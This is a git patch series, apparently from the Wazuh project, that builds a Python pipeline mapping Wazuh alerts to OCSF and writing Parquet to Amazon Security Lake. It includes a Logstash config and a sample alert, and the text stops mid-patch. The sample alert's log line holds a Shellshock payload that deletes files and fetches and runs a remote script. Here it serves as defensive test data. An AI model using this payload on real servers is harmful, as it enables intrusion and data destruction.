From 159adcb5e33ab0d3b99fd274f00a0e38028b075d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:47:23 -0300 Subject: [PATCH 01/34] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake --- integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 integrations/stdin_to_securitylake.py diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py new file mode 100755 index 0000000000000..fd70e41906ccb --- /dev/null +++ b/integrations/stdin_to_securitylake.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python3 + +import os +import sys +import argparse +import logging +import time +from datetime import datetime +from pyarrow import json +import pyarrow.parquet as pq + +def encode_parquet(json_list): + for json in json_list: + ### read_json is meant for files, need to change it to read from a string + ### https://arrow.apache.org/docs/python/json.html + table = json.read_json(json) + pq.write_table(table, 'parquet/output.parquet') + +def push_to_s3(parquet): + ## Fill with AWS S3 code + pass + +def read_chunk(fileobject,length): + output=[] + for i in range(0,length): + line = fileobject.readline() + if line is '': + output.append(line) + break + output.append(line) + return output + +def get_elapsedtime(reference_timestamp): + current_time = datetime.now(tz='UTC') + return (current_time - reference_timestamp).total_seconds() + +if __name__ == "__main__": + + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H:%M:%S') + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + + parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') + + debugging = parser.add_argument_group('debugging') + debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') + debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.debug("Running main()") + logging.debug("Current time is " + str(clockstr) ) + + try: + logging.info('BUFFERING STDIN') + + with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + + output_buffer = [] + + starttimestamp = datetime.now(tz='UTC') + + try: + while True: + output_buffer.append(read_chunk(stdin,args.linebuffer)) + if output_buffer[len(output_buffer)-1] is '': + time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: + encode_parquet(output_buffer) + logging.debug(output_buffer) + starttimestamp = datetime.now(tz='UTC') + output_buffer = [] + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + + + logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: + logging.error("Error running script") + exit(1) From 6e17aae0dc430737a6f73d239dd991b6b219d418 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:50:39 -0300 Subject: [PATCH 02/34] Adding logstash pipeline for python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} From a05c23c080f6592fc5a4a53617983d558cebb752 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 03/34] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code @@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From e04f0d53846556fbeb3a6eced7e71fc77b509344 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 04/34] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 93935fc24dd0fe5d2a1519d0b5ec01e51cb05994 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 05/34] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output @@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1db384c0da0b0b2f60173861aa87a1c27e05494b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 06/34] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): @@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From c60045fbcf5a7ebd55be6054969f0f4c0fc3c46f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 07/34] Add s3 handling reference links --- integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,16 +7,19 @@ import time import json from datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 8949097be444871ed6db264c1133c1d005f6fdf3 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 08/34] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] @@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') @@ -77,7 +80,7 @@ def parse_arguments(): output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) + encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From eb7ace3c3c4a02388596c36584766deb06a902da Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:08:52 -0300 Subject: [PATCH 09/34] Added basics of map_to_ocsf() function --- integrations/ocsf-mapping.json | 42 +++++++++++++++++++++++++++ integrations/stdin_to_securitylake.py | 22 +++++++++++--- 2 files changed, 60 insertions(+), 4 deletions(-) create mode 100644 integrations/ocsf-mapping.json diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json new file mode 100644 index 0000000000000..b2cf6d3b8d3f7 --- /dev/null +++ b/integrations/ocsf-mapping.json @@ -0,0 +1,42 @@ +{ + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "state_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.type" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } +} diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 2b8a1de14755b..d125a2ff6d56b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -11,17 +11,30 @@ block_ending = { "block_ending": True } -s3 = fs.S3FileSystem(region='eu-west-3') +s3 = fs.S3FileSystem() -def map_to_ocsf(): - ## Code that translates fields to OCSF +def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): + ocsf_alert = {} + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) + ### Put constants into the output alert + ocsf_alert |= mappings['constants'] + + for key in mappings['mappings']: + dotted_destination_field = mappings['mappings'].get(key) + depth_levels = dotted_destination.split('.') + current_level = alert_dictionary[depth_levels[0]] + if len(depth_levels>1): + for field in depth_levels[1:]: + current_level = current_level[field] + ocsf_alert[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### - ### Credentials can be stored in /root/.aws/credentials + ### Credentials can be stored in ~/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) @@ -49,6 +62,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') From 3d7b8ff585d5680fce00a5cdf60bbce2b3c5307f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:41:04 -0300 Subject: [PATCH 10/34] Minor fixes --- integrations/stdin_to_securitylake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d125a2ff6d56b..51cb67a49ac29 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder): def read_block(fileobject,length): output=[] - for i in range(0,length): + for line in range(0,length): line = fileobject.readline() if line == '': output.append(block_ending) break + alert = json.loads(line) output.append(json.loads(line)) return output From 545f855a679015d214c04588fb7758311701cc0c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Wed, 7 Feb 2024 18:54:18 -0300 Subject: [PATCH 11/34] Map alerts to OCSF as they are read --- integrations/stdin_to_securitylake.py | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 51cb67a49ac29..3a6145747783a 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,12 +13,10 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): - ocsf_alert = {} - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) +def map_to_ocsf(alert_dictionary, mappings, ocsf_output): + ocsf_output = {} ### Put constants into the output alert - ocsf_alert |= mappings['constants'] + ocsf_output |= mappings['constants'] for key in mappings['mappings']: dotted_destination_field = mappings['mappings'].get(key) @@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename): if len(depth_levels>1): for field in depth_levels[1:]: current_level = current_level[field] - ocsf_alert[key] = current_level + ocsf_output[key] = current_level def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder): ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def read_block(fileobject,length): +def map_block(fileobject, length, mappings): output=[] - for line in range(0,length): + for line in range(0, length): line = fileobject.readline() if line == '': output.append(block_ending) break alert = json.loads(line) - output.append(json.loads(line)) + ocsf_mapped_alert = {} + map_to_ocsf(alert, mappings, ocsf_mapped_alert): + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -77,6 +77,8 @@ def parse_arguments(): logging.info('BUFFERING STDIN') try: + with open(ocsf_mapping_filename) as jsonfile: + mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: output_buffer = [] @@ -90,7 +92,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = read_block(stdin,args.linebuffer) + current_block = map_block(stdin, args.linebuffer, mappings) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From f753b1235f54b6b94dc94f242808256829e40e94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 8 Feb 2024 19:45:53 +0100 Subject: [PATCH 12/34] Add script to convert Wazuh events to OCSF Also adds a simple test script --- .../amazon-security-lake/ocsf/__init__.py | 2 + .../amazon-security-lake/ocsf/converter.py | 82 +++++++++++++++++ .../amazon-security-lake/ocsf/test.py | 15 ++++ .../ocsf/wazuh-event.sample.json | 90 +++++++++++++++++++ 4 files changed, 189 insertions(+) create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py create mode 100644 integrations/amazon-security-lake/ocsf/converter.py create mode 100644 integrations/amazon-security-lake/ocsf/test.py create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py new file mode 100644 index 0000000000000..777a7d20549b5 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/__init__.py @@ -0,0 +1,2 @@ +# Python module placeholder +# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py new file mode 100644 index 0000000000000..a9168aead1e1a --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -0,0 +1,82 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string + "name": event["_source"]["decoder"]["name"], + "type": "Rule", # analytic.type is redundant together with type_id + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object + "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + # Skipped. + # OCSF description of this field is: The version of the product, as + # defined by the event source. For example: 2013.1.3-beta. We do not + # save such info as part of the event data. + # "version": "4.9.0", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py new file mode 100644 index 0000000000000..e7d947848b067 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/test.py @@ -0,0 +1,15 @@ +#!/usr/bin/python + +from converter import convert +import json + +converted_event = {} +with open("wazuh-event.sample.json", "r") as fd: + sample_event = json.load(fd) + # print(json.dumps(sample_event, indent=4)) + converted_event = convert(sample_event) + +if converted_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(converted_event, fd) + print("Done") \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json new file mode 100644 index 0000000000000..3f35697a9fe36 --- /dev/null +++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json @@ -0,0 +1,90 @@ +{ + "_index": "wazuh-alerts-4.x-2024.02.08", + "_id": "yBMliY0Bt8FzffO0BOIu", + "_version": 1, + "_score": null, + "_source": { + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From dcc119e07edfff1c99655a0755c9632662a662fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 13/34] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 + .../{ => 